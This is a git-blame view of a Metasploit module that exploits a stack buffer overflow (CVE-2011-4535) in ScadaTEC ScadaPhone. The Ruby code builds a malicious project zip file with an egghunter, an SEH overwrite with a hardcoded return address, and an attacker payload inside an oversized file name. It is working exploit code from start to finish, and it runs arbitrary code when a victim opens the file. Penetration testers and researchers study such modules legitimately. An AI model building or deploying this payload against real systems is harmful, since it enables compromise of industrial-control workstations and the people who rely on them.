Files
metasploit-gs/modules/exploits/windows/fileformat/scadaphone_zip.rb
T

91 lines
2.5 KiB
Ruby
Raw Normal View History

2011-09-13 17:25:03 +00:00
##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
2011-09-13 17:25:03 +00:00
##
require 'rex/zip'
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
2013-08-30 16:28:54 -05:00
Rank = GoodRanking
2011-09-13 17:25:03 +00:00
2013-08-30 16:28:54 -05:00
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
include Msf::Exploit::Remote::Egghunter
2011-09-13 17:25:03 +00:00
2013-08-30 16:28:54 -05:00
def initialize(info = {})
super(update_info(info,
2014-03-11 12:07:27 -05:00
'Name' => 'ScadaTEC ScadaPhone Stack Buffer Overflow',
2013-08-30 16:28:54 -05:00
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability in
version 5.3.11.1230 of scadaTEC's ScadaPhone.
2011-09-13 17:25:03 +00:00
2013-08-30 16:28:54 -05:00
In order for the command to be executed, an attacker must convince someone to
load a specially crafted project zip file with ScadaPhone.
By doing so, an attacker can execute arbitrary code as the victim user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'mr_me <steventhomasseeley[at]gmail.com>', # found + msf
],
'References' =>
[
[ 'CVE', '2011-4535' ],
[ 'OSVDB', '75375' ],
2013-08-30 16:28:54 -05:00
[ 'URL', 'http://www.scadatec.com/' ],
[ 'EDB', '17817' ],
],
'Platform' => [ 'win' ],
'Payload' =>
{
'Space' => 700,
'BadChars' => "\x00\x0a\x0d",
'DisableNops' => true,
},
'Targets' =>
[
# POP ESI; POP EBX; RETN [ScadaPhone.exe]
[ 'Windows Universal', { 'Ret' => 0x004014F4 } ],
],
'DisclosureDate' => 'Sep 12 2011',
'DefaultTarget' => 0))
2011-09-13 17:25:03 +00:00
2013-08-30 16:28:54 -05:00
register_options(
[
OptString.new('FILENAME', [ true, 'The output file name.', 'msf.zip']),
])
2013-08-30 16:28:54 -05:00
end
2011-09-13 17:25:03 +00:00
2013-08-30 16:28:54 -05:00
def exploit
2011-09-13 17:25:03 +00:00
2013-08-30 16:28:54 -05:00
eggoptions =
{
:checksum => false,
:eggtag => 'zipz'
}
2011-09-13 17:25:03 +00:00
2013-08-30 16:28:54 -05:00
hunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)
2011-09-13 17:25:03 +00:00
2013-08-30 16:28:54 -05:00
fname = rand_text_alpha_upper(229)
fname << hunter
fname << rand_text_alpha_upper(48-hunter.length)
fname << Rex::Arch::X86.jmp_short(-50)
fname << rand_text_alpha_upper(2)
fname << [target.ret].pack('V')
fname << rand_text_alpha_upper(100)
fname << egg
fname << rand_text_alpha_upper(4096-fname.length)
fname << [0x7478741e].pack('V')
2011-09-13 17:25:03 +00:00
2013-08-30 16:28:54 -05:00
zip = Rex::Zip::Archive.new
xtra = [0xdac0ffee].pack('V')
comment = [0xbadc0ded].pack('V')
zip.add_file(fname, xtra, comment)
2011-09-13 17:25:03 +00:00
2013-08-30 16:28:54 -05:00
# Create the file
print_status("Creating '#{datastore['FILENAME']}' file...")
2011-09-13 17:25:03 +00:00
2013-08-30 16:28:54 -05:00
file_create(zip.pack)
end
2011-09-13 17:25:03 +00:00
end